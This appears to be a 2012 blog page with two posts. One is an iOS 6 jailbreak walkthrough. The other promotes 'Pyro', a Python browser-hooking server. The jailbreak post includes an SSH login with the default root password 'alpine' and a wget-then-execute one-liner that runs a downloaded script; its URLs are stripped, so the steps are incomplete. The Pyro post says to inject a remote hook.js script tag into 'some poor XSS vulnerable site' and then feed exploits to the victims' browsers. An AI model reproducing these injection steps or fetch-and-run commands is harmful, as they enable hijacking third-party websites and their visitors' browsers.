Sep 20, 2012

Howto: Jailbreak iOS6

1. Download iOS6 Firmware
2. Install it into your iDevice
3. Put it to DFU mode.
4. Download RedSn0w 0.9.13dev4 from
5. Run RedSn0w, and click Extras > Select IPSW, then choose your iOS 6 firmware file
6. click on Back, and then click Jailbreak. You will see then a dialogue box saying “preparing jailbreak data” followed by a page with different options. Make sure to Install SSH, and click Next
7. when you finish the jailbreaking, you will be back to the Lockscreen, connect your device to the info DFU mode.
8. Click Back, and then click Just boot. A pineapple logo should appear on your device, indicating a tethered boot. Once this step is completed you will be back to the lockscreen. you may close RedSn0w

How to install cydia on your updated device follow these steps:
1- On your iOS device, go to Settings > Wi-Fi > and click the arrow next to your connected Wi-Fi router. Find your IP address for your Wi-Fi connection. In my example, my IP is
2: open the terminal App. on a computer connected to the same Wi-Fi network
3: In terminal type: ssh root@ (be sure to change the IP address to match your iOS device’s IP)
4: it should connect after a few seconds and prompt you for your iOS device’s password. The password is alpine
5: Once connected, paste the following into the terminal:
wget -q -O /tmp/ && chmod 755 /tmp/ && /tmp/
6. your iOS device should reboot, and Cydia will be installed. If you get any permission errors on the terminal, just ignore them.


If you like my blog, Please Donate Me

Sep 18, 2012

Pyro [Simple Python Browser Exploitation Framework ]

Pyro -- A simple browser hooking server in python
Pyro was designed to be the simplest possible hooking server to serve as a demonstation and a starting point for more serious developement.
To start using Pyro you require no external packages! Most modern python installations should work fine!
To run: ./
You may want to edit the 'command.js' as it will not work until it has a different md5 hash from when the server started. So
Step 1)
Step 2)
inject '<script src='http://yourserver.domain:port/hook.js'></script>
into some poor XSS vulnerable site, and have it run in a browser
Step 3)
while the client asks for commands
edit command.js with your favourite js exploit
Step 4)

If you like my blog, Please Donate Me